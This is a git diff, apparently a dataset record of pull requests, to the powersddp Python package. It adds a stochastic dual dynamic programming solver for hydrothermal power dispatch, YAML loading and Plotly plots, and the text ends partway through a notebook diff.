name = "pytz"
version = "2021.1"
description = "World timezone definitions, modern and historical"
-category = "dev"
+category = "main"
optional = false
python-versions = "*"
@@ -969,7 +1005,7 @@ win32 = ["pywin32"]
name = "six"
version = "1.16.0"
description = "Python 2 and 3 compatibility utilities"
-category = "dev"
+category = "main"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
@@ -981,6 +1017,17 @@ category = "dev"
optional = false
python-versions = ">=3.5"
+[[package]]
+name = "tenacity"
+version = "8.0.1"
+description = "Retry code until it succeeds"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+doc = ["reno", "sphinx", "tornado (>=4.5)"]
+
[[package]]
name = "terminado"
version = "0.11.0"
@@ -1114,7 +1161,7 @@ python-versions = "*"
[metadata]
lock-version = "1.1"
python-versions = "^3.8"
-content-hash = "a80ab2d038ebd23b2a35fddb2e703975351608f10eedf2519677c49d97feb518"
+content-hash = "cae2aa10dea3acba3f146c7781ed78b2fb59bceac409a73911ca7d08dbffb158"
[metadata.files]
anyio = [
@@ -1531,10 +1578,61 @@ notebook = [
{file = "notebook-6.4.3-py3-none-any.whl", hash = "sha256:b50eafa8208d5db966efd1caa4076b4dfc51815e02a805b32ecd717e9e6cc071"},
{file = "notebook-6.4.3.tar.gz", hash = "sha256:e6b6dfed36b00cf950f63c0d42e947c101d4258aec21624de62b9e0c11ed5c0d"},
]
+numpy = [
+ {file = "numpy-1.21.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38e8648f9449a549a7dfe8d8755a5979b45b3538520d1e735637ef28e8c2dc50"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:fd7d7409fa643a91d0a05c7554dd68aa9c9bb16e186f6ccfe40d6e003156e33a"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:a75b4498b1e93d8b700282dc8e655b8bd559c0904b3910b144646dbbbc03e062"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1412aa0aec3e00bc23fbb8664d76552b4efde98fb71f60737c83efbac24112f1"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e46ceaff65609b5399163de5893d8f2a82d3c77d5e56d976c8b5fb01faa6b671"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:c6a2324085dd52f96498419ba95b5777e40b6bcbc20088fddb9e8cbb58885e8e"},
+ {file = "numpy-1.21.1-cp37-cp37m-win32.whl", hash = "sha256:73101b2a1fef16602696d133db402a7e7586654682244344b8329cdcbbb82172"},
+ {file = "numpy-1.21.1-cp37-cp37m-win_amd64.whl", hash = "sha256:7a708a79c9a9d26904d1cca8d383bf869edf6f8e7650d85dbc77b041e8c5a0f8"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:95b995d0c413f5d0428b3f880e8fe1660ff9396dcd1f9eedbc311f37b5652e16"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:635e6bd31c9fb3d475c8f44a089569070d10a9ef18ed13738b03049280281267"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4a3d5fb89bfe21be2ef47c0614b9c9c707b7362386c9a3ff1feae63e0267ccb6"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a326af80e86d0e9ce92bcc1e65c8ff88297de4fa14ee936cb2293d414c9ec63"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:791492091744b0fe390a6ce85cc1bf5149968ac7d5f0477288f78c89b385d9af"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0318c465786c1f63ac05d7c4dbcecd4d2d7e13f0959b01b534ea1e92202235c5"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9a513bd9c1551894ee3d31369f9b07460ef223694098cf27d399513415855b68"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:91c6f5fc58df1e0a3cc0c3a717bb3308ff850abdaa6d2d802573ee2b11f674a8"},
+ {file = "numpy-1.21.1-cp38-cp38-win32.whl", hash = "sha256:978010b68e17150db8765355d1ccdd450f9fc916824e8c4e35ee620590e234cd"},
+ {file = "numpy-1.21.1-cp38-cp38-win_amd64.whl", hash = "sha256:9749a40a5b22333467f02fe11edc98f022133ee1bfa8ab99bda5e5437b831214"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d7a4aeac3b94af92a9373d6e77b37691b86411f9745190d2c351f410ab3a791f"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d9e7912a56108aba9b31df688a4c4f5cb0d9d3787386b87d504762b6754fbb1b"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25b40b98ebdd272bc3020935427a4530b7d60dfbe1ab9381a39147834e985eac"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a92c5aea763d14ba9d6475803fc7904bda7decc2a0a68153f587ad82941fec1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:05a0f648eb28bae4bcb204e6fd14603de2908de982e761a2fc78efe0f19e96e1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f01f28075a92eede918b965e86e8f0ba7b7797a95aa8d35e1cc8821f5fc3ad6a"},
+ {file = "numpy-1.21.1-cp39-cp39-win32.whl", hash = "sha256:88c0b89ad1cc24a5efbb99ff9ab5db0f9a86e9cc50240177a571fbe9c2860ac2"},
+ {file = "numpy-1.21.1-cp39-cp39-win_amd64.whl", hash = "sha256:01721eefe70544d548425a07c80be8377096a54118070b8a62476866d5208e33"},
+ {file = "numpy-1.21.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2d4d1de6e6fb3d28781c73fbde702ac97f03d79e4ffd6598b880b2d95d62ead4"},
+ {file = "numpy-1.21.1.zip", hash = "sha256:dff4af63638afcc57a3dfb9e4b26d434a7a602d225b42d746ea7fe2edf1342fd"},
+]
packaging = [
{file = "packaging-21.0-py3-none-any.whl", hash = "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14"},
{file = "packaging-21.0.tar.gz", hash = "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7"},
]
+pandas = [
+ {file = "pandas-1.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ba7ceb8abc6dbdb1e34612d1173d61e4941f1a1eb7e6f703b2633134ae6a6c89"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fcb71b1935249de80e3a808227189eee381d4d74a31760ced2df21eedc92a8e3"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa54dc1d3e5d004a09ab0b1751473698011ddf03e14f1f59b84ad9a6ac630975"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:34ced9ce5d5b17b556486da7256961b55b471d64a8990b56e67a84ebeb259416"},
+ {file = "pandas-1.3.2-cp37-cp37m-win32.whl", hash = "sha256:a56246de744baf646d1f3e050c4653d632bc9cd2e0605f41051fea59980e880a"},
+ {file = "pandas-1.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:53b17e4debba26b7446b1e4795c19f94f0c715e288e08145e44bdd2865e819b3"},
+ {file = "pandas-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f07a9745ca075ae73a5ce116f5e58f691c0dc9de0bff163527858459df5c176f"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9e8e0ce5284ebebe110efd652c164ed6eab77f5de4c3533abc756302ee77765"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:59a78d7066d1c921a77e3306aa0ebf6e55396c097d5dfcc4df8defe3dcecb735"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:132def05e73d292c949b02e7ef873debb77acc44a8b119d215921046f0c3a91d"},
+ {file = "pandas-1.3.2-cp38-cp38-win32.whl", hash = "sha256:69e1b2f5811f46827722fd641fdaeedb26002bd1e504eacc7a8ec36bdc25393e"},
+ {file = "pandas-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7996d311413379136baf0f3cf2a10e331697657c87ced3f17ac7c77f77fe34a3"},
+ {file = "pandas-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:1738154049062156429a5cf2fd79a69c9f3fa4f231346a7ec6fd156cd1a9a621"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cce01f6d655b4add966fcd36c32c5d1fe84628e200626b3f5e2f40db2d16a0f"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1099e2a0cd3a01ec62cca183fc1555833a2d43764950ef8cb5948c8abfc51014"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0cd5776be891331a3e6b425b5abeab9596abea18435c5982191356f9b24ae731"},
+ {file = "pandas-1.3.2-cp39-cp39-win32.whl", hash = "sha256:66a95361b81b4ba04b699ecd2416b0591f40cd1e24c60a8bfe0d19009cfa575a"},
+ {file = "pandas-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:89f40e5d21814192802421df809f948247d39ffe171e45fe2ab4abf7bd4279d8"},
+ {file = "pandas-1.3.2.tar.gz", hash = "sha256:cbcb84d63867af3411fa063af3de64902665bb5b3d40b25b2059e40603594e87"},
+]
pandocfilters = [
{file = "pandocfilters-1.4.3.tar.gz", hash = "sha256:bc63fbb50534b4b1f8ebe1860889289e8af94a23bff7445259592df25a3906eb"},
]
@@ -1554,6 +1652,10 @@ pickleshare = [
{file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
{file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
]
+plotly = [
+ {file = "plotly-5.2.1-py2.py3-none-any.whl", hash = "sha256:bf7c8123541a2c6579c309561a8e1058c129434c67419651efbdc4922b11da8f"},
+ {file = "plotly-5.2.1.tar.gz", hash = "sha256:1575c34f87313818fc109a3d3326f2b91363d049c1e80cbf68561c8df24fb47c"},
+]
pluggy = [
{file = "pluggy-0.13.1-py2.py3-none-any.whl", hash = "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d"},
{file = "pluggy-0.13.1.tar.gz", hash = "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0"},
@@ -1769,6 +1871,10 @@ sniffio = [
{file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"},
{file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"},
]
+tenacity = [
+ {file = "tenacity-8.0.1-py3-none-any.whl", hash = "sha256:f78f4ea81b0fabc06728c11dc2a8c01277bfc5181b321a4770471902e3eb844a"},
+ {file = "tenacity-8.0.1.tar.gz", hash = "sha256:43242a20e3e73291a28bcbcacfd6e000b02d3857a9a9fff56b297a27afdc932f"},
+]
terminado = [
{file = "terminado-0.11.0-py3-none-any.whl", hash = "sha256:221eef83e6a504894842f7dccfa971ca2e98ec22a8a9118577e5257527674b42"},
{file = "terminado-0.11.0.tar.gz", hash = "sha256:1e01183885f64c1bba3cf89a5a995ad4acfed4e5f00aebcce1bf7f089b0825a1"},
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
index d8e72df..69a4181 100644
--- a/powersddp/core/system.py
+++ b/powersddp/core/system.py
@@ -1,59 +1,208 @@
"""Module to handle classes and methods related to a selected Power System.
-This module should follow a systems.json file standar:
-{
- "{name}": {
- "shedding_cost": float,
- "load": [float, float, float],
- "n_disc": int,
- "n_est": int,
- "n_cen": int,
- "generation_units": [
- {"type": "hydro",
- "name": "str",
- "v_max": float,
- "v_min": float,
- "prod": float,
- "flow_max": float,
- "inflow_scenarios":[<list>]},
- {"type": "thermal", "name": "str", "capacity": "float", "cost": float},
- ...
- ]
- }
-}
-Where {name} should be changed to whatever name you may choose to your system.
-For example, 'Test01'. Check README.md file.
+This module should follow a systems.yml file standard:
+
+# system.yml
+load: [float,float,float]
+discretizations: int
+stages: int
+scenarios: int
+outage_cost: float
+hydro-units: !include system-hydro.yml
+thermal-units: !include system-thermal.yml
+
+# system-hydro.yml
+-
+ name: str
+ v_max: float
+ v_min: float
+ prod: float
+ flow_max: float
+ inflow_scenarios:
+ - list<float>
+ - list<float>
+ - list<float>
+
+# system-thermal.yml
+-
+ name: str
+ capacity: float
+ cost: float
"""
-from abc import ABC, abstractclassmethod
+from abc import ABC, abstractmethod
+from itertools import product
+import numpy as np
+import pandas as pd
import yaml
-from powersddp.util._yml import YmlLoader
-
-YmlLoader.add_constructor("!include", YmlLoader.include)
+from powersddp.utils._yml import YmlLoader
+from powersddp.utils._solver import sdp, plot_future_cost_function
class PowerSystemInterface(ABC):
- @abstractclassmethod
+ @abstractmethod
def load_system(self):
raise NotImplementedError
+ @abstractmethod
+ def dispatch(self):
+ raise NotImplementedError
+
class PowerSystem(PowerSystemInterface):
- def __init__(self, verbose: bool = False, **kwargs):
- self.__verbose = verbose
- self.__dict__.update(kwargs)
- self.load_system()
+ """Singleton Class to instantiate a Power System.
- def load_system(self):
- if "path" in self.__dict__:
- with open(self.path, "r") as f:
- data = yaml.load(f, YmlLoader)
-
- self.data = data
- if self.__verbose:
- print("System loaded from {} file".format(self.path))
- elif "data" in self.__dict__:
- if self.__verbose:
- print("System loaded from 'data' payload")
+ A Power System is defined based on set of parameters, including the systems parameters
+ and all the generation units. Both thermal and hydro.
+
+ Note: Either initialize a Power System by providing the path to a systems.yml file or
+ by providing a dictionary containing all the necessary data.
+
+ Attributes
+ ----------
+ path : str, optional
+ Path to the systems.yml file
+ data : dict, optional
+ Dictionary containing all of the power system parameters, including the generation units.
+
+ """
+
+ def __init__(self, path: str = None, data: dict = None):
+ """__init__ method.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the systems.yml file.
+ data : :obj:`dict`, optional
+ Description of `param2`. Multiple
+ lines are supported.
+ param3 : :obj:`int`, optional
+ Dictionary containing all of the power system parameters, including the generation units.
+
+ """
+
+ self.load_system(path=path, data=data)
+
+ def load_system(self, *, path: str = None, data: dict = None):
+ """Loads a Power System from file or dictionary payload
+
+ A Power System data be loaded from both file or dictionary payload. In case both
+ positional parameters are suplied the file path will have priority and data payload
+ will be ignored.
+
+ PowerSystem loads the data by default during initialization, but can be reloaded ad-hoc.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the .yml file containing the system data.
+ data : dict, optional
+ Dictionary containing the structured data of the system.
+
+ """
+ if path:
+ with open(path, "r") as f:
+ self.data = yaml.load(f, YmlLoader)
+ elif data:
+ self.data = data
else:
- raise NotImplementedError
+ raise ValueError(
+ "load_system() should receive path=str or data=dict as arguments"
+ )
+
+ def dispatch(
+ self, *, solver: str = "sdp", plot: bool = False, verbose: bool = False
+ ) -> pd.DataFrame:
+ """Solves a financial dispatch of a Power System class
+
+ Once instantiated a Power System can deploy the generation units based on the
+ minimization of an objective function. This method iterates over every stage
+ and scenario of the Power System, finding the optimal solution of the problem
+ using the Dual Stochastic Dynamic Programming technique.
+
+ Parameters
+ ----------
+ plot : bool, optional
+ Boolean to plot the future cost function of every stage.
+ verbose : bool, optional
+ Dictionary containing the structured data of the system.
+
+ Returns
+ -------
+ operation : pandas.DataFrame
+ A Dataframe containing the operation on every stage and scenario.
+
+ """
+
+ n_hgu = len(self.data["hydro-units"])
+
+ step = 100 / (self.data["discretizations"] - 1)
+ discretizations = list(product(np.arange(0, 100 + step, step), repeat=n_hgu))
+
+ operation = []
+ cuts = [] # type: ignore
+ for stage in range(self.data["stages"], 0, -1):
+ for discretization in discretizations:
+
+ v_i = []
+ # For Every Hydro Unit
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ v_i.append(
+ hgu["v_min"]
+ + (hgu["v_max"] - hgu["v_min"]) * discretization[i] / 100
+ )
+
+ # For Every Scenario
+ average = 0.0
+ avg_water_marginal_cost = [0 for _ in self.data["hydro-units"]]
+ for scenario in range(self.data["scenarios"]):
+ inflow = []
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ inflow.append(hgu["inflow_scenarios"][stage - 1][scenario])
+
+ if verbose:
+ print(
+ "STAGE: {} | DISC.: {}% | SCENARIO: {}".format(
+ stage, int(discretization[0]), scenario
+ )
+ )
+ result = sdp(
+ system_data=self.data,
+ v_i=v_i,
+ inflow=inflow,
+ cuts=cuts,
+ stage=stage + 1,
+ verbose=verbose,
+ )
+ average += result["total_cost"]
+ for i, hgu in enumerate(result["hydro_units"]):
+ avg_water_marginal_cost[i] += hgu["water_marginal_cost"]
+
+ # Calculating the average of the scenarios
+ average = average / self.data["scenarios"]
+ coef_b = average
+ for i, hgu in enumerate(result["hydro_units"]):
+ # ! Invert the coefficient because of the minimization problem inverts the signal
+ avg_water_marginal_cost[i] = (
+ -avg_water_marginal_cost[i] / self.data["scenarios"]
+ )
+ coef_b -= v_i[i] * avg_water_marginal_cost[i]
+
+ cuts.append(
+ {"stage": stage, "coef_b": coef_b, "coefs": avg_water_marginal_cost}
+ )
+ operation.append(
+ {
+ "stage": stage,
+ "storage_percentage": "{}%".format(int(discretization[i])),
+ "initial_volume": v_i[0],
+ "average_cost": round(average, 2),
+ }
+ )
+ operation_df = pd.DataFrame(operation)
+
+ if n_hgu == 1 and plot:
+ plot_future_cost_function(operation=operation_df)
+
+ return operation_df
diff --git a/powersddp/util/__init__.py b/powersddp/utils/__init__.py
similarity index 100%
rename from powersddp/util/__init__.py
rename to powersddp/utils/__init__.py
diff --git a/powersddp/utils/_solver.py b/powersddp/utils/_solver.py
new file mode 100644
index 0000000..a2d597f
--- /dev/null
+++ b/powersddp/utils/_solver.py
@@ -0,0 +1,215 @@
+"""Utilitarian module to solve power systems.
+"""
+
+
+import cvxopt.modeling as model
+import pandas as pd
+import plotly.graph_objects as go
+
+from cvxopt import solvers
+from plotly.subplots import make_subplots
+
+solvers.options["glpk"] = dict(msg_lev="GLP_MSG_OFF")
+
+
+# Unique Linear Programming
+def ulp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Unique Linear Programming Solver
+
+ Parameters
+ ----------
+ system_data : dict,
+ Dict containing data structured as used to instantiate a PowerSystem.
+ v_i : list
+ List containing the initial volume of the Hydro Units, for each
+ v_i : list
+ List containing the inflow to the Hydro Units
+ verbose : bool, optional
+ Dictionary containing the structured data of the system.
+ """
+
+ return None
+
+
+# Stochastic Dual Programming
+def sdp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Stochastic Dual Programming Solver
+
+ Method to abstract the Dual Stochastic Programming solver applied to the power system
+ problem.
+
+ Parameters
+ ----------
+ system_data : dict,
+ Dict containing data structured as used to instantiate a PowerSystem.
+ v_i : list
+ List containing the initial volume of the Hydro Units, for each
+ v_i : list
+ List containing the inflow to the Hydro Units
+ verbose : bool, optional
+ Dictionary containing the structured data of the system.
+
+ Returns
+ -------
+ operation : dict
+ A dictionary representing the operation
+ """
+
+ n_tgu = len(system_data["thermal-units"])
+ n_hgu = len(system_data["hydro-units"])
+
+ ## Initializing Model Variables
+ v_f = model.variable(n_hgu, "Final Volume")
+ v_t = model.variable(n_hgu, "Turbined Flow")
+ v_v = model.variable(n_hgu, "Shed Flow")
+ g_t = model.variable(n_tgu, "Power Generated")
+ shortage = model.variable(1, "Power Shortage")
+ alpha = model.variable(1, "Future Cost")
+
+ ## Objective Function
+ objective_function = 0
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ objective_function += tgu["cost"] * g_t[i]
+ objective_function += system_data["outage_cost"] * shortage[0]
+ for i, _ in enumerate(system_data["hydro-units"]):
+ objective_function += 0.01 * v_v[i]
+ objective_function += 1.0 * alpha[0]
+
+ ## Constraints
+ ### Hydro Balance
+ constraints = []
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i])
+
+ ### Load Supply
+ supplying = 0
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ supplying += hgu["prod"] * v_t[i]
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ supplying += g_t[i]
+
+ supplying += shortage[0]
+
+ constraints.append(supplying == system_data["load"][stage - 2])
+
+ ### Bounds
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] >= hgu["v_min"])
+ constraints.append(v_f[i] <= hgu["v_max"])
+ constraints.append(v_t[i] >= 0)
+ constraints.append(v_t[i] <= hgu["flow_max"])
+ constraints.append(v_v[i] >= 0)
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ constraints.append(g_t[i] >= 0)
+ constraints.append(g_t[i] <= tgu["capacity"])
+
+ constraints.append(shortage[0] >= 0)
+ constraints.append(alpha[0] >= 0)
+
+ ### Cut constraint (Future cost function of forward stage)
+ for cut in cuts:
+ if cut["stage"] == stage:
+ equation = 0
+ for hgu in range(n_hgu):
+ equation += float(cut["coefs"][hgu]) * v_f[hgu]
+ equation += float(cut["coef_b"]) # type: ignore
+ constraints.append(alpha[0] >= equation)
+
+ ## Solving
+ opt_problem = model.op(objective=objective_function, constraints=constraints)
+ opt_problem.solve(format="dense", solver="glpk")
+
+ ## Print
+ if verbose:
+ print("--------------------------------------")
+ print("Total Cost: ${}".format(round(objective_function.value()[0], 2))) # type: ignore
+ print("Future Cost: ${}".format(round(alpha[0].value()[0], 2)))
+ print("--------------------------------------")
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_f.name, v_f[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_t.name, v_t[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_v.name, v_v[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} $/hm3".format(
+ i, "Water Cost", constraints[i].multiplier.value[0]
+ )
+ )
+ print("--------------------------------------")
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ print("TGU {} | {}: {:>7.2f} MWmed".format(i, g_t.name, g_t[i].value()[0]))
+ print("--------------------------------------")
+
+ print(
+ """{}: {:.2f} MWmed\nMarginal Cost: {:.2f}\n======================================\n
+ """.format(
+ shortage.name,
+ shortage[0].value()[0],
+ constraints[n_hgu].multiplier.value[0],
+ )
+ )
+
+ return {
+ "shortage": shortage[0].value()[0],
+ "operational_marginal_cost": constraints[n_hgu].multiplier.value[0],
+ "total_cost": objective_function.value()[0], # type: ignore
+ "future_cost": alpha[0].value()[0],
+ "hydro_units": [
+ {
+ "v_f": v_f[i].value()[0],
+ "v_t": v_t[i].value()[0],
+ "v_v": v_v[i].value()[0],
+ "water_marginal_cost": constraints[i].multiplier.value[0],
+ }
+ for i in range(n_hgu)
+ ],
+ "thermal_units": [{"g_t": g_t[i].value()[0]} for i in range(n_tgu)],
+ }
+
+
+def plot_future_cost_function(operation: pd.DataFrame):
+
+ n_stages = len(operation["stage"].unique())
+
+ fig = make_subplots(rows=n_stages, cols=1)
+
+ for i, stage in enumerate(operation["stage"].unique()):
+ stage_df = operation.loc[operation["stage"] == stage]
+ fig.add_trace(
+ go.Scatter(
+ x=stage_df["initial_volume"],
+ y=stage_df["average_cost"],
+ mode="lines",
+ name="Stage {}".format(stage),
+ ),
+ row=i + 1,
+ col=1,
+ )
+
+ fig.update_xaxes(title_text="Final Volume [hm3]")
+ fig.update_yaxes(title_text="$/MW")
+
+ fig.update_layout(height=300 * n_stages, title_text="Future Cost Function")
+ fig.show()
diff --git a/powersddp/util/_yml.py b/powersddp/utils/_yml.py
similarity index 62%
rename from powersddp/util/_yml.py
rename to powersddp/utils/_yml.py
index b0b21b8..72f1c7a 100644
--- a/powersddp/util/_yml.py
+++ b/powersddp/utils/_yml.py
@@ -1,8 +1,17 @@
+"""Utilitarian module to deal with .yml files
+"""
+
import yaml
import os
class YmlLoader(yaml.SafeLoader):
+ """Class to extend yaml loader capabilities
+
+ Attributes
+ ----------
+ """
+
def __init__(self, stream):
self._root = os.path.split(stream.name)[0]
@@ -11,7 +20,10 @@ def __init__(self, stream):
def include(self, node):
- filename = os.path.join(self._root, self.construct_scalar(node))
+ filename = os.path.join(self._root, self.construct_scalar(node)) # type: ignore
with open(filename, "r") as f:
return yaml.load(f, YmlLoader)
+
+
+YmlLoader.add_constructor("!include", YmlLoader.include)
diff --git a/pyproject.toml b/pyproject.toml
index 31928aa..df3a553 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -12,6 +12,9 @@ exclude = ["Makefile","README.rst","Notebook.ipynb"]
python = "^3.8"
PyYAML = "^5.4.1"
cvxopt = "^1.2.6"
+numpy = "^1.21.1"
+pandas = "^1.3.2"
+plotly = "^5.2.1"
[tool.poetry.dev-dependencies]
pytest = "^5.2"
| Feature 04 dispatch finished
## Comments
> Closes #4
First release feature.
Power System dispatches correctly for a single Hydro Unit and multiple Thermal Units
| 2021-08-22T22:49:13 | 0.0 | [] | [] |
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-6 | 72449e1235b803e5162629753fbad01de98fb6e3 | diff --git a/Notebook.ipynb b/Notebook.ipynb
index 18782e2..1eb6b54 100644
--- a/Notebook.ipynb
+++ b/Notebook.ipynb
@@ -2,27 +2,19 @@
"cells": [
{
"cell_type": "code",
- "execution_count": 1,
+ "execution_count": 2,
"id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
"metadata": {},
- "outputs": [
- {
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System loaded from system.yml file\n"
- ]
- }
- ],
+ "outputs": [],
"source": [
- "from powersddp.system import PowerSystem\n",
- "import cvxopt.modeling as model\n",
+ "import powersddp as psddp\n",
"\n",
- "data = {'load': [50, 50, 50],\n",
+ "\n",
+ "data = {'load': [100, 15, 50],\n",
" 'discretizations': 3,\n",
" 'stages': 3,\n",
" 'scenarios': 2,\n",
- " 'shedding_cost': 500,\n",
+ " 'outage_cost': 500,\n",
" 'hydro-units': [{'name': 'HU1',\n",
" 'v_max': 100,\n",
" 'v_min': 20,\n",
@@ -32,7 +24,20 @@
" 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
" {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
"\n",
- "TestSystem = PowerSystem(path='system.yml')"
+ "TestSystem = psddp.PowerSystem(data=data)"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 6,
+ "id": "0b41801a-dc45-4777-a2ec-1294c91890cc",
+ "metadata": {
+ "scrolled": true,
+ "tags": []
+ },
+ "outputs": [],
+ "source": [
+ "operation = TestSystem.dispatch()"
]
},
{
@@ -66,7 +71,7 @@
" \\begin{aligned}\n",
" \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v\\\\\n",
" \\textrm{s.t.} \\quad & \\\\\n",
- " \\textrm{hydro balance} \\quad & v_f = v_i + afl - v_t \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) \\\\\n",
" \\textrm{load supplying} \\quad & \\rho\\cdot v_t + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
" \\textrm{constraints} \\quad & \\\\\n",
" & v_{f_{min}}\\leq v_f \\leq v_{f_{max}}\\\\\n",
@@ -83,15 +88,24 @@
},
{
"cell_type": "code",
- "execution_count": 4,
+ "execution_count": 16,
"id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
"metadata": {},
"outputs": [],
"source": [
- "def dispatch(system, v_i, inflow):\n",
+ "import cvxopt.modeling as model\n",
+ "from cvxopt import solvers\n",
+ "\n",
+ "import pandas as pd\n",
+ "import plotly.graph_objects as go\n",
+ "from plotly.subplots import make_subplots\n",
+ "\n",
